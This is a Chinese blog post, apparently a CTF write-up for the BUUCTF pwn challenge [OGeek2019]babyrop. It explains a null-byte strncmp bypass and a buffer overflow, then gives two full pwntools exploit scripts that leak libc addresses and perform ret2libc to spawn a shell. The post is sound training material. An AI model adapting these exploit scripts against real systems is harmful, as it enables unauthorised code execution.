[OGeek2019]babyrop wp(python3脚本,py2见末尾链接)

最新推荐文章于 2024-05-06 17:11:26 发布
最新推荐文章于 2024-05-06 17:11:26 发布
阅读量78 收藏
点赞数
文章标签: 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kata_Jhin/article/details/129406450
版权

事前准备

地址随机+nx 32bit 给了libc文件,合理猜想和libc利用有关系

看看ida

(为了便于看和记忆,按n对函数名进行了重命名处理)

主函数

倒计时函数:(其功能如图中注释,因为与本题关系不大,不多作赘述)

调用的一个函数:

调用的另一个函数:

字符串里啥也没有:

漏洞及其利用思路

不难发现,除了第二个子函数(bufwrite),其他没什么利用点,程序功能大概就是实现一个随机数的取出作为密钥,通过了(srandcheck)就可以实现对内存的写入(bufwirte)。

如果们要利用bufwrite的话,我们就要想办法通过check,strnmp()一般情况下是只有相等才会返回0.但有一个特殊情况,当比较位数为0时,返回的也是0,所以直接首字符填充'\0'就可以bypas,bufwrite的控制就很简单了,注意在bufwirte函数填入的buf[7]足够溢出并控制函数执行即可,这里直接用\ff。

溢出后就是ret2libc的情况了,这里不作赘述。看了exp注解还不懂的建议先去看看ret2libc

exp:

from pwn import*
from LibcSearcher import*

p=remote('node4.buuoj.cn',25207)
#p=process('./OGeek2019]babyrop') #用于本地调试,直接连接本地进程
elf=ELF('./OGeek2019]babyrop')
write_plt=elf.plt['write']
write_got=elf.got['write']
libc=ELF('libc-2.23.so')
mainadd=0x8048825          #ida里直接查窗口底部,方法详见前几篇wp

payload=b'\0'+b'a'*6+b'\xff'       #第一个函数  buf [7]再往后加不加无所谓
p1=payload
p.sendline(p1)

payload2=b'a'*(231+4)+p32(write_plt)+p32(mainadd)+p32(1)+p32(write_got)+p32(8) 
p2=payload2        #填充+rbp 溢出后调用write函数 leak 其地址(8位)到stdout,返回到main以便继续控制

p.sendlineafter(b'Correct\n',p2)  #也可以在中间差一个recvunti(b"Correct\n”)或者sleep{1}本质只是为了防止payload发送过快使p2无效

write_add=u32(p.recv(4))  #接收四字节(2位hex=1kb)

offset=write_add-libc.sym['write']    #offset=ture-libc
shadd=offset+libc.search(b'/bin/sh').__next__() 
sysadd=offset+libc.sym['system']


payload3=b'a'*(231+4)+p32(sysadd)+p32(123)+p32(shadd)
p3=payload3    #溢出getshell

p.sendline(p1)
p.recvuntil(b'Correct\n')
p.sendline(p3)

p.interactive()   #开启交互

不用自带libc:

这种方法在本题会出现libcsearcher抽风的情况(查出很多个,或者直接查不到),所以不能getshell,放在此处作为pytho3下无libc的语法参考:

from pwn import *
from LibcSearcher import *
#p=remote('node3.buuoj.cn',26210)
p=process('./OGeek2019]babyrop')
elf=ELF('./OGeek2019]babyrop')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x8048825
payload1=b'\0'+b'\xff'*7
p.sendline(payload1)
p.recvline()
payload2=b'a'*(0xe7 + 0x4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload2)
write_addr=u32(p.recv(4)) #接收4字节地址
libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write') #本地就是.sym 非本地就是 .dump
system_addr=libc_base+libc.dump('system')
bin_sh_addr=libc_base+libc.dump('str_bin_sh')   #字符是.search('stringnmae').next()
p.sendline(payload1)
p.recvline()
payload3=b'a'*(0xe7 + 0x4)+p32(system_addr) + p32(0) +p32(bin_sh_addr)
p.sendline(payload3)
p.interactive()

getshell

在参考Python2写Python3脚本中的注意事项

这也是困扰了我蛮久的一个问题,之前一直以为libcsearcher py3 和py2的语法规则不同,也不太掌握py3的exp编写,本题之后大概理解了

结论

libcsearcher的语法规则2 3下区别基本上没有区别(我此次编写的脚本参考了py2的exp,对libc的部分基本上没有改动)

py3主要是字符型与字节型不允许直接相加,所以要在前加b,这是一个最重要的区别,另外,.next()在python3下写为.__next__()

原因链接:https://blog.csdn.net/tenderzhe/article/details/73480561

Python2版本exp的参考链接,也对有无使用自带的libc的语法规则总结的比较到位,可以看看:

https://blog.csdn.net/weixin_45556441/article/details/115207142

Kata_Jhin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用Python3分析sitemap.xml并抓取导出全站链接详解
09-21
因为最近更换了网址,所以需要在百度站长平台提交网址,不管是主动推送还是手动提交,前提都是要整理网站的链接,手动添加太麻烦,于是就想写个脚本直接抓取全站链接并导出,本文详细介绍的是实现的方法及过程,需要...
Python库 | wp_toolbox-0.4.0-py3-none-any.whl
05-11
资源分类:Python库 所属语言:Python 资源全名:wp_toolbox-0.4.0-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
OGeek2019bayrop
m0_62322730的博客
05-06 348
OGeek2019bayrop
[OGeek2019]babyrop
m0sway的博客
03-22 1102
[OGeek2019]babyrop WriteUp BUU_PWN
[OGeek2019]babyrop[BUUCTF]
最新发布
moonlightsunshin的博客
05-06 356
首先我们要确保strncmp=0保证程序不退出,直接让v1=0strncmp就会为0strncmp用来获取长度当读到"\0"会自动赋0所以我们让buf[0]="\x00"没有/bin/sh和system加上题目这道题的思路就是利用write泄露出libc的地址来进行ROP。buf长度只需0xe7+4就可以溢出。32位开了NX,地址随机化基本排除shellcode的可能。write也是libc库中的标准函数。shift+f12看字符串。
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 3476
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTF上pwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 411
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
BUUCTF pwn——[OGeek2019]babyrop
CNS-Enterprise BCC-1701-J
04-02 231
BUUCTF 做题练习
Python库 | scopus.wp-0.1.0-py2.py3-none-any.whl
03-24
python库,解压后可用。 资源全名:scopus.wp-0.1.0-py2.py3-none-any.whl
Python库 | scopus.wp-0.2.2.10-py2.py3-none-any.whl
02-20
python库,解压后可用。 资源全名:scopus.wp-0.2.2.10-py2.py3-none-any.whl
[BUUCTF]PWN7——[OGeek2019]babyrop
mcmuyanga的博客
08-25 1205
[BUUCTF]PWN7——[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启了RELRO(对got表不可以写)和NX(堆栈不可执行) nc的时候没有什么回显,用32位ida打开附件,shift+f12查看程序里的字符串,没有发现system和/bin/sh 从main函数开始看程序 用户输入一个字符串给buf,然后跟随机数比较大小,strncmp里的比较长度的参数v1是我们输入
ctf【[OGeek2019]babyrop
HUANGliang_的博客
10-29 244
(1)用0x00绕过strncmp比较 (2)进入sub_80487D0函数进行第二次输入,因为buf有0xe7字节,因此0xc8是不够输入的,为使得多输入一些字符可以将a1写为0xff (3)泄漏read的got地址,求得偏移量,通过溢出执行write函数,打印出read的got地址,并在此之后重新执行sub_80487D0函数 (4)根据得到的read的got地址求偏移量,计算出system函数地址和"\bin\sh"的地址,实施漏洞攻击,夺取权限
Buuctf(pwn)[OGeek2019]babyrop
半岛铁盒的博客
03-25 657
发现第二个函数有个read函数,但它是0x20是不能够构成漏洞利用,只是利用它作为中间的一个简单的输出即可; 跳过if判定: 只需在第一次输入时 在最前面加上 ‘\0’ a1上上一次返回的 buf[7] 这里的漏洞点利用, 要保证 a1的值尽可能的大, 这里选择的是 ‘xff’ – 255 该题目已经为我们提供了Libc Exp可以这样写 from pwn import * p = remote("node3.buuoj.cn",29829) libc=ELF('libc-2.23....
CTF buuoj pwn-----第8题:[OGeek2019]babyrop
bing_Max的博客
09-27 483
CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag 前言 梳理记录一下这道题的解题过程. 1. checksec bing@bing-virtual-machine:~/pwn$ checksec babyrop [*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F
buuctf13-17题
XDiku的博客
01-29 130
ok
限制操作 killw3wp
12-30
killw3wp 是一种用于终止运行中的 w3wp.exe 进程的命令。w3wp.exe 是由 IIS (Internet Information Services) 使用的工作进程进程,它负责处理和执行网站上的请求。无论是在开发环境还是生产环境中,都需要小心操作 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值